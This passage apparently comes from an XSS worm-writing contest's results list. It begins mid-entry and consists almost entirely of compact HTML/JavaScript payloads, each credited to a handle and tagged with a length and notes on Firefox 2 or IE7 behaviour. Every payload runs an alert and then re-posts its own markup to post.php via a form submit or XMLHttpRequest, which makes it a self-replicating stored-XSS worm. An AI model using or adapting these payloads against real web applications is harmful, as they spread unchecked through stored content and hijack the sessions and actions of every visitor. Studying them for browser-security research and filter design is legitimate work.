onerror="with(parentNode)alert('XSS',submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(0,158)))">
ma1 - 163 Works in FF with no growth then shrinks and then regrows to the same size in IE7.0!!!
<form><INPUT name="content"><IMG src=""
onerror="with(parentNode)alert('XSS',submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(0,157)))">
sdc (via dev80) - 142 Doesn't work in Firefox 2.0.0.11
<script>function
p(){with(XMLHttpRequest)open("post","past.php"),send("content=<script>"+p.valueOf(alert('xss'))+"p()<\/script>")}p()</script>
dev80 - 145 Doesn't work in Firefox 2.0.0.11
<script>function p() {x=new
XMLHttpRequest;x.open("post","past.htm");x.send("content=<script>"
+ p.valueOf() + "p()<\/script>");}p()</script>
ma1 (via sdc) - 158 Doesn't work in Firefox 2.0.0.11
<form id=_><input
name="content"><script>with(_)alert('XSS',submit(action=(method='post')+'.php',content.value='<form
id=_>'+innerHTML.slice(0,148)))</script>
barbarianbob - 171 Works in FF with no growth but doesn't work in IE7.0
<b><form id="f"><input name="content"><img
src=""
onerror="with(f)submit(alert('xss'),content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php')"></form></b>
sdc - 145 Doesn't work in Firefox 2.0.0.11
<form id=z><INPUT
name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form
id=z>'+innerHTML))</SCRIPT>
sdc (via ronald) - 103 Grows
<input name="content"><script>i.content.value=document.body.innerHTML+alert('xss');i.submit();</script>
sdc (via spyware) - 159 Doesn't work in Firefox 2.0.0.11
<form method="POST" name="content" action="post.php"><img
src="."
onError="content.value=document.content.innerHTML+alert('xss');javascript:content.submit();">
spyware - 149 Doesn't work in Firefox 2.0.0.11
<form method=POST name=content action=post.php <img src=.
onError=content.value=document.content.innerHTML+alert('xss');javascript:content.submit();>
ronald - 142 Grows
<form method=post action=post.php name=i><input
name=content><script>i.content.value=document.body.innerHTML+alert('xss');i.submit();</script>
ronald - 139 Grows
<form method=post action=post.php name=i><input
name=content><script>i.content.value=document.i.innerHTML+alert('xss');i.submit();</script>
ronald - 142 Grows
<form method=post action=post.php name=i><input
name=content><script>content.value=document.body.i.innerHTML+alert('xss');i.submit();</script>
spyware - 116 Doesn't work in Firefox 2.0.0.11
<form name=o action=post.php <img src=. onError=o.value=document.body.innerHTML+alert('xss');javascript:o.submit();>
gareth - 229 Doesn't work in Firefox 2.0.0.11 (double encoded)
<script>(function(){alert('XSS');document.write('<form
method=post action=post.php><input type=image
onerror="form.submit()" src><input
value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+'
name=content>')})()</script>
gareth - 206 Doesn't work in Firefox 2.0.0.11
<script>(function(){alert('XSS');with(document)write('<form
method=post action=post.php><input
value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+'
name=content>'),forms[0].submit()})()</script>
Ronald - 139 Grows
<form method=post action=post.php name=i><input
name=content><script>content.value=document.body.innerHTML+alert('xss');i.submit();</script>
gareth - 164 Doesn't work in Firefox 2.0.0.11 (double encoded)
<form><input name=content type=image
onerror="with(form)action=(method='post')+'.php',i=escape('<form>'+innerHTML);value=i;type='hidden';alert('XSS');submit()"
src>
ronald - 119 Grows
<form name="i"><input name="content"><marquee
onstart="content.value=document.body.innerHTML+alert('xss');i.submit();">
ronald - 107 Grows
<form name=content><marquee onstart="content.value=document.body.innerHTML+alert('xss');content.submit();">
gareth - 167 Doesn't work in Firefox 2.0.0.11 (double encoded) if you remove escape it shrinks, but does not work in IE7.0
<form><input name=content type=image
onerror="f=form;i=f.innerHTML;type='hidden';alert('XSS');f.action=(f.method='post')+'.php';value=escape('<form>'+i);submit()"
src>
gareth - 222 Doesn't work in Firefox 2.0.0.11 (double encoded)
<form><input name=content type=image
onerror="f=this.form;i=f.innerHTML.replace(/(.*)/,'<form>$1</form>');this.type='hidden';alert('XSS');f.action='post.php';f.method='post';f.content.value=escape(i);submit()"
src=></form>
spikeman - 143 Doesn't work in Firefox 2.0.0.11
<form id=z><input
name=content><script>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form
id=z>'+innerHTML))</script>
ronald - 81 Grows
<script>f.content.value=document.body.innerHTML+alert("xss");f.submit();</script>
bwb labs - 168 Doesn't work in Firefox 2.0.0.11
<script>f=function(){alert("XSS");(x=new
XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>f="+f+";f()</sc"+"ript>"));};f()</script>
bwb labs - 193 Doesn't work in Firefox 2.0.0.11
<script>eval(y="alert('XSS');q=String.fromCharCode(34);(x=new
XMLHttpRequest()).open('POST','post.php');x.send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>
sdc - 145 Doesn't work in Firefox 2.0.0.11
<form id=z><input
name="content"><script>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form
id=z>'+innerHTML))</script>
sdc - 159 Doesn't work in Firefox 2.0.0.11
<form id=z><INPUT
name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form
id=z>'+innerHTML.substr(0,148)))</SCRIPT>
ritz - 162 Works in FF with no growth but does not work in IE7.0
<form><input name="content" src=""
onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';value='<form>'+p.innerHTML.substr(0,155);click()"
type="image">
sdc (barbarianbob) - 178 Works in FF with no growth but stops working in IE7.0 after first iteration
<b><form action="post.php" method="post"><img
src="."
onerror="alert('xss');with(parentNode)content.value=parentNode.innerHTML.bold(),submit()"><input
name="content"></form></b>
barbarianbob - 165 Grows
<b<form action=post.php method=post><img src=.
onerror=alert('xss');with(parentNode)content.value=parentNode.innerHTML.bold(),submit()><input
name=content></form</b>
ritz - 176 Doesn't work in Firefox 2.0.0.11
<b><img
onerror="alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php',submit()"
src="">
<form><input name="content"></form></b>
ma1 - 181 Works in FF with no growth and shrinks in IE7.0!!!
<b><img
onerror="alert('xss');with(this.nextSibling)content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php',submit()"
src=""><form><input
name="content"></form></b>
ritz - 187 Works in FF with no growth and shrinks in IE7.0!!!
<b><img src="."
onerror="alert('xss');with(this.nextSibling)firstChild.value=parentNode.innerHTML.bold(),submit()"><form
method="post" action="post.php"><input
name="content"></form></b>
ritz - 181 Doesn't work in Firefox 2.0.0.11
<b><img src="." onerror="alert('xss');with(this.nextSibling)firstChild.value=parentNode.innerHTML.bold(),submit()">
<form method=post action=post.php><input name=content></form></b>
.mario - 166 Doesn't work in Firefox 2.0.0.11
<b<img src=m
onerror=alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),submit()><form
method=post action=post.php><input
name=content></form</b
ma1 - 173 Grows
<b><form method=post action=post.php><img src=.
onerror=alert('xss');with(this.parentNode)content.value=parentNode.innerHTML.bold(),submit()><input
name=content></form></b>
bwb labs - 188 Works in FF with no growth and shrinks in IE7.0!!!
<b><img
onerror="alert('xss');n=(m=this.parentNode).lastChild;n[0].value='<b>'+m.innerHTML+'</b>';n.submit()"
src=""><form action="post.php" method="post"><input
name="content"></form></b>
ma1 - 174 Grows
<b><img src=.
onerror=alert('xss');with(this.nextSibling)content.value=parentNode.innerHTML.bold(),submit()><form
method=post action=post.php><input
name=content></form></b>
ritz - 191 Grows
<s><img src=.
onerror="alert('xss');f=this.nextSibling;f.firstChild.value='<s>'+this.parentNode.innerHTML+'</s>';f.submit()">
<form method=post action=post.php><input name=content></form></s>
arantius - 178 Breaks DOM knowledge rule
<p><form method=post action=post.php><input
name=content><script>alert('XSS');F=document.forms;f=F[F.length-1];
f.content.value='<p>'+f.parentNode.innerHTML;f.submit();</script>
barbarianbob - 185 Grows
<b><img src
onerror="alert('xss');n=(m=this.parentNode).lastChild;n.content.value='<b>'+m.innerHTML+'</b>';n.submit()"
<form method=post action=post.php><input name=content></form></b>
ritz - 194 Grows
<i><img src=.
onerror="alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()">
<form method=post action=post.php><input name=content></form></i>
.mario - 150 Grows
<form method=post action=post.php><img src=x
onerror=i=this.parentNode;i.lastChild.value=i.parentNode.innerHTML;i.submit()><input
name=content></form>
ritz - 196 Doesn't work in Firefox 2.0.0.11
<i><img src="/"
onerror="alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()">
<form method=post action=post.php><input name=content></form></i>
ritz - 195 Doesn't work in Firefox 2.0.0.11
<i><img src="/"
onerror=alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()">
<form method=post action=post.php><input name=content></form></i>
matt preston - 223 Doesn't work in Firefox 2.0.0.11
<script>alert('XSS');a='<scr'+'ipt>'+arguments.callee+'()</scr'+'ipt>';document.write('<form
method=post action=post.php name=f><input value='+encodeURI(a)+'
name=content></form>');body.onload=function(){document.f.submit()}</script>
gareth - 265 Doesn't work in Firefox 2.0.0.11
<script>function(){alert('XSS');a='<scr'+'ipt>'+arguments.callee+'()</scr'+'ipt>';document.write('<form
method=post action=post.php name=f><input
value='+encodeURIComponent(a)+'
name=content></form>');this.onload=function(){document.f.submit()}}()</script>
digi7al64 - 266 Doesn't work in Firefox 2.0.0.11
<p id=e><script>alert('xss');var
d=document;s='script>';p='<form method=post name=f
action=post.php><input name=content value="+escape("<p
id=e>"+d.getElementById(\'e\').innerHTML+"</p>")+"></form><'+s+'d.f.submit();</'+s;p='d.write("'+p+'");';
eval(p);</script></p>